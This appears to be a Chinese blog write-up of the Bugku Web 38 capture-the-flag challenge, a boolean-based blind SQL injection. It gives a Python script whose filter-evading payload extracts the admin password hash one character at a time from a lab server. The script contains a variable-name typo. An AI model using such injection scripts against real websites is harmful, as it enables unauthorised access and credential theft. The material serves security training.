Bugku Web 38

Bugku Web 38

提 示: 基于布尔的SQL盲注

曾经我以为SQL注入很简单,没有多加练习,直到发现自己连ciscn初赛的easy_sql注入都不会做,我才追悔莫及

你看那个连SQL注入都不会的人好像条🐕啊

先瞅瞅

进入环境,是一个登陆页面,先试试万能密码(×),先试试adminbugku,adminbugkuctf,然后得到了flag,此题完

好好做

显示不合法的输入,显然被过滤了

然后再试试别的,发现被过滤的还有and,空格,逗号,等号,for
然后写脚本爆破password

import requests
import time
import string
url = 'http://114.67.246.176:19762/index.php'
source = string.digits + string.ascii_lowercase
a = ''
for i in range(1, 50):
    for j in sourse:
        payload = "admin'^((ascii(mid((select(password)from(admin))from(%s))))<>%s)^1#" % (i, ord(j))
        data = {'username': payload, 'password': '0'}
        res = requests.post(url, data=data)
        time.sleep(0.01)# 不加sleep网站会因访问过快拒绝访问
        if 'username does not exist!' in res.text:
            a += j
            print(a)
            break

然后得到结果,用MD5解密可以看到密码是bugkuctf,好家伙

之后假装刚知道的账号密码,去登陆就得到了flag

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值